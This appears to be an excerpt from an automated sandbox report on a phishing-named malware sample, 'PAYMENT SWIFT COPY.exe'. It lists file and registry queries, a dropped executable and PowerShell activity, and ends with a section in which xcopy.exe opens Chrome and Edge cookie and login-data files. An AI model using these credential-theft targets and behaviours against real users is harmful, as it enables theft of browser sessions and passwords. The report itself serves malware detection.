Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc | VolumeInformation (repeated 2 times)
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\HTOWERT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\LATINWD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\LFAXI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\ROCCB___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation (repeated 2 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation (repeated 3 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation (repeated 2 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation (repeated 3 times)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeQueries volume information: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

Source: Yara match | File source: 8.2.PAYMENT SWIFT COPY.exe.400000.0.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 8.2.PAYMENT SWIFT COPY.exe.400000.0.unpack | type: UNPACKEDPE
Source: Yara match | File source: 00000014.00000002.4143260862.00000000057D0000.00000040.80000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000013.00000002.1987208170.0000000000110000.00000040.80000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4141273840.0000000002D30000.00000004.00000800.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000008.00000002.1867935515.0000000001810000.00000040.10000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4145888813.00000000067A0000.00000040.80000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000008.00000002.1867200881.0000000000400000.00000040.00000400.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4141340650.0000000002D80000.00000004.00000800.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1984565405.0000000002C60000.00000040.10000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4139835446.0000000000520000.00000040.80000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4141036989.00000000038E0000.00000040.00000001.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000008.00000002.1869778786.00000000031D0000.00000040.10000000.00040000.00000000.sdmp | type: MEMORY
Source: C:\Windows\SysWOW64\xcopy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\xcopy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\xcopy.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\xcopy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
